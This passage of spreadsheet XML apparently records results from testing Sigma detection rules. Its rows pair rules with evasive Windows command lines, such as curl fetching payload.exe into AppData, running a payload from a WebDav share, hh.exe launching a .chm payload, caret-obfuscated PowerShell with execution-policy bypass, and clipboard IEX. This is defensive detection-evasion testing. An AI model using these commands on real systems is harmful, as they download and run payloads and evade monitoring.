        <v>0</v>
      </c>
    </row>
    <row r="4051" ht="15.75" customHeight="1" s="42">
      <c r="A4051" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4051" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4051" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4051" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4051" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /V:ON /c "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F4051" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4051" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4051" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4051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51" s="43" t="n"/>
      <c r="K4051" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4052" ht="15.75" customHeight="1" s="42">
      <c r="A4052" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4052" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4052" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4052" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4052" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /V:oN /c "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F4052" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4052" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4052" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4052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52" s="43" t="n"/>
      <c r="K4052" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4053" ht="15.75" customHeight="1" s="42">
      <c r="A4053" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4053" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4053" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4053" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4053" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /v:on /c "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F4053" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4053" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4053" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4053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53" s="43" t="n"/>
      <c r="K4053" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4054" ht="15.75" customHeight="1" s="42">
      <c r="A4054" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4054" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4054" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4054" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4054" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /"V:ON" /c "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F4054" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4054" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4054" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4054" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J4054" s="43" t="n"/>
      <c r="K4054" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4055" ht="15.75" customHeight="1" s="42">
      <c r="A4055" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4055" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4055" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4055" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4055" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /v:ON /C "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F4055" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4055" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4055" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4055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4055" s="43" t="n"/>
      <c r="K4055" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4056" ht="15.75" customHeight="1" s="42">
      <c r="A4056" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4056" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_net_use_and_exec_combo</t>
        </is>
      </c>
      <c r="C4056" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Execution From Internet Hosted WebDav Share</t>
        </is>
      </c>
      <c r="D4056" s="43" t="inlineStr">
        <is>
          <t>f0507c0f-a3a2-40f5-acc6-7f543c334993</t>
        </is>
      </c>
      <c r="E4056" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c " net use https://192.0.2.1/share &amp; start \\192.0.2.1\DavWWWRoot\payload.exe "</t>
        </is>
      </c>
      <c r="F4056" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4056" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4056" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4056" s="43" t="inlineStr">
        <is>
          <t>Windows Internet Hosted WebDav Share Mount Via Net.EXE (7e6237fe-3ddb-438f-9381-9bf9de5af8d0); Windows Share Mount Via Net.EXE (f117933c-980c-4f78-b384-e3d838111165); System Network Connections Discovery Via Net.EXE (1c67a717-32ba-409b-a45d-0fb704a73a81)</t>
        </is>
      </c>
      <c r="J4056" s="43" t="n"/>
      <c r="K4056" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4057" ht="15.75" customHeight="1" s="42">
      <c r="A4057" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4057" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_net_use_and_exec_combo</t>
        </is>
      </c>
      <c r="C4057" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Execution From Internet Hosted WebDav Share</t>
        </is>
      </c>
      <c r="D4057" s="43" t="inlineStr">
        <is>
          <t>f0507c0f-a3a2-40f5-acc6-7f543c334993</t>
        </is>
      </c>
      <c r="E4057" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C " net use https://192.0.2.1/share &amp; start \\192.0.2.1\DavWWWRoot\payload.exe "</t>
        </is>
      </c>
      <c r="F4057" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4057" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4057" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4057" s="43" t="inlineStr">
        <is>
          <t>Windows Internet Hosted WebDav Share Mount Via Net.EXE (7e6237fe-3ddb-438f-9381-9bf9de5af8d0); Windows Share Mount Via Net.EXE (f117933c-980c-4f78-b384-e3d838111165); System Network Connections Discovery Via Net.EXE (1c67a717-32ba-409b-a45d-0fb704a73a81)</t>
        </is>
      </c>
      <c r="J4057" s="43" t="n"/>
      <c r="K4057" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4058" ht="15.75" customHeight="1" s="42">
      <c r="A4058" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4058" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C4058" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D4058" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E4058" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Public\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F4058" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4058" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4058" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4058" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J4058" s="43" t="n"/>
      <c r="K4058" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4059" ht="15.75" customHeight="1" s="42">
      <c r="A4059" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4059" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C4059" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D4059" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E4059" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "copy C:\Windows\hh.exe C:\ProgramData\not_hh.exe &amp;&amp; C:\ProgramData\not_hh.exe C:\Users\%USERNAME%\Documents\payload.chm"</t>
        </is>
      </c>
      <c r="F4059" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4059" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4059" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4059" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J4059" s="43" t="n"/>
      <c r="K4059" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4060" ht="15.75" customHeight="1" s="42">
      <c r="A4060" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4060" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C4060" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D4060" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E4060" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd %USERPROFILE%\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F4060" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4060" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4060" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4060" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J4060" s="43" t="n"/>
      <c r="K4060" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4061" ht="15.75" customHeight="1" s="42">
      <c r="A4061" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4061" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C4061" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D4061" s="43" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E4061" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"nop" -noni -w 1 -exEC bypass -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F4061" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4061" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4061" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4061" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4061" s="43" t="n"/>
      <c r="K4061" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4062" ht="15.75" customHeight="1" s="42">
      <c r="A4062" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4062" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C4062" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D4062" s="43" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E4062" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo Write-Host 'Bypass' | powershell.exe -noprofile -command -"</t>
        </is>
      </c>
      <c r="F4062" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4062" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4062" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4062" s="43" t="n"/>
      <c r="J4062" s="43" t="n"/>
      <c r="K4062" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4063" ht="15.75" customHeight="1" s="42">
      <c r="A4063" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4063" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C4063" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D4063" s="43" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E4063" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C "echo Write-Host 'Bypass' | powershell.exe -noprofile -command -"</t>
        </is>
      </c>
      <c r="F4063" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4063" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4063" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4063" s="43" t="n"/>
      <c r="J4063" s="43" t="n"/>
      <c r="K4063" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4064" ht="15.75" customHeight="1" s="42">
      <c r="A4064" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4064" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C4064" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D4064" s="43" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E4064" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c echo Write-Host "'Bypass Test'" | clip &amp; powershell -"c" IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F4064" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4064" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4064" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4064" s="43" t="n"/>
      <c r="J4064" s="43" t="n"/>
      <c r="K4064" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4065" ht="15.75" customHeight="1" s="42">
      <c r="A4065" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4065" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C4065" s="43" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D4065" s="43" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E4065" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "type C:\Users\Public\script.ps1 | powershell.exe -noprofile -"</t>
        </is>
      </c>
      <c r="F4065" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4065" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4065" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4065" s="43" t="n"/>
      <c r="J4065" s="43" t="n"/>
      <c r="K4065" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4066" ht="15.75" customHeight="1" s="42">
      <c r="A4066" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4066" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_parent_process</t>
        </is>
      </c>
      <c r="C4066" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parent Process</t>
        </is>
      </c>
      <c r="D4066" s="43" t="inlineStr">
        <is>
          <t>754ed792-634f-40ae-b3bc-e0448d33f695</t>
        </is>
      </c>
      <c r="E4066" s="43" t="inlineStr">
        <is>
          <t>C:\WINDOWS\system32\cmd.exe /c "powershell.exe" -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt</t>
        </is>
      </c>
      <c r="F4066" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4066" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4066" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4066" s="43" t="n"/>
      <c r="J4066" s="43" t="n"/>
      <c r="K4066" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4067" ht="15.75" customHeight="1" s="42">
      <c r="A4067" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4067" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_parent_process</t>
        </is>
      </c>
      <c r="C4067" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parent Process</t>
        </is>
      </c>
      <c r="D4067" s="43" t="inlineStr">
        <is>
          <t>754ed792-634f-40ae-b3bc-e0448d33f695</t>
        </is>
      </c>
      <c r="E4067" s="43" t="inlineStr">
        <is>
          <t>C:\WINDOWS\system32\cmd.exe /k powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt</t>
        </is>
      </c>
      <c r="F4067" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4067" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4067" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4067" s="43" t="n"/>
      <c r="J4067" s="43" t="n"/>
      <c r="K4067" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4068" ht="15.75" customHeight="1" s="42">
      <c r="A4068" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4068" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C4068" s="43" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D4068" s="43" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E4068" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c p^o^w^e^r^s^h^e^l^l.exe /"nop" -ep bypass -"c" "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F4068" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4068" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4068" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4068" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4068" s="43" t="n"/>
      <c r="K4068" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4069" ht="15.75" customHeight="1" s="42">
      <c r="A4069" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4069" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C4069" s="43" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D4069" s="43" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E4069" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /C p^o^w^e^r^s^h^e^l^l.exe -"nop" -"ep" bypass -"c" "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F4069" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4069" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4069" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4069" s="43" t="n"/>
      <c r="J4069" s="43" t="n"/>
      <c r="K4069" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4070" ht="15.75" customHeight="1" s="42">
      <c r="A4070" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4070" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C4070" s="43" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D4070" s="43" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E4070" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c powershell.exe -"nop" -Ep bypass -C "Start-Process calc.exe"</t>
        </is>
      </c>
      <c r="F4070" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4070" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4070" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4070" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4070" s="43" t="n"/>
      <c r="K4070" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4071" ht="15.75" customHeight="1" s="42">
      <c r="A4071" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4071" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C4071" s="43" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D4071" s="43" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E4071" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /C powershell.exe /"nop" -ep bypass -c "Start-Process calc.exe"</t>
        </is>
      </c>
      <c r="F4071" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4071" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4071" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4071" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4071" s="43" t="n"/>
      <c r="K4071" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4072" ht="15.75" customHeight="1" s="42">
      <c r="A4072" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4072" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C4072" s="43" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D4072" s="43" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E4072" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c powershell.exe -nop /"ep" bypass -c "Start-Process calc.exe"</t>
        </is>
      </c>
      <c r="F4072" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4072" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4072" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4072" s="43" t="n"/>
      <c r="J4072" s="43" t="n"/>
      <c r="K4072" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4073" ht="15.75" customHeight="1" s="42">
      <c r="A4073" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4073" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C4073" s="43" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D4073" s="43" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E4073" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /C powershell.exe -nop -ep bypass /"c" "Start-Process calc.exe"</t>
        </is>
      </c>
      <c r="F4073" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4073" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4073" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4073" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4073" s="43" t="n"/>
      <c r="K4073" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4074" ht="15.75" customHeight="1" s="42">
      <c r="A4074" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4074" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C4074" s="43" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D4074" s="43" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E4074" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c powershell.exe -nop -"ep" bypass -"c" "Start-Process calc.exe"</t>
        </is>
      </c>
      <c r="F4074" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4074" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4074" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4074" s="43" t="n"/>
      <c r="J4074" s="43" t="n"/>
      <c r="K4074" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4075" ht="15.75" customHeight="1" s="42">
      <c r="A4075" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4075" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C4075" s="43" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D4075" s="43" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E4075" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c powershell.exe -nOp /"ep" bypass -"c" "Start-Process calc.exe"</t>
        </is>
      </c>
      <c r="F4075" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4075" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4075" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4075" s="43" t="n"/>
      <c r="J4075" s="43" t="n"/>
      <c r="K4075" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4076" ht="15.75" customHeight="1" s="42">
      <c r="A4076" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4076" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C4076" s="43" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
